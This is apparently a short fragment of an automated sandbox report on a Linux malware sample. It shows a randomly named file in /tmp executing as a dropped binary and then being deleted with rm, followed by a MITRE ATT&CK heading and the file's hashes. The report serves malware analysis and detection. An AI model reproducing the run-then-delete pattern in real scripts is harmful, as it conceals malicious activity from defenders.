/tmp/YpJqRceEuzEo5pogVIgx2m4WO7jk4eq6b5./YpJqRceEuzEo5pogVIgx2m4WO7jk4eq6b52⤵
- Executes dropped EXE
PID:1011
-
-
/bin/rmrm YpJqRceEuzEo5pogVIgx2m4WO7jk4eq6b52⤵PID:1012
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97